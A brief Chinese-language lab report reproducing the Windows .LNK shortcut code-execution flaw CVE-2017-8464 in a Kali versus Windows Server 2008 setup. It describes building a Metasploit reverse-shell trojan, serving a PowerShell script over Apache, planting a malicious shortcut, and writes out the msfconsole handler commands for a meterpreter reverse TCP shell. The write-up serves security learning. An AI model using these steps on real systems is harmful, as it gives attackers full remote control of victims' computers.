1.实验目的: 复现CVE-2017-8464(远程执行命令)漏洞
2.实验内容:攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。
3.实验条件:
①kali
②win server 2008
4.实验步骤:
(1).查看kali ip,192.168.64.144
(2).用metasploit创建一个反弹shell木马
(3)把1.ps1 移动到/var/www/html下 命令 cp/1.ps1 /var/www/html
(4)开启apache服务,然后访问127.0.0.1/1.ps1
(5)在靶机创建一个powershell快捷方式
(6).kali下创建监听反弹
启动msfconsole
use exploit/multi/handler
set PAYLOADwindows/x64/meterpreter/reverse_tcp
set LHOST 攻击机IP地址
set LPORT 9999
exploit 或run
5.实验心得:
利用U盘,网络共享等途径触发漏洞,该漏洞会完全控制用户系统,安全风险高危。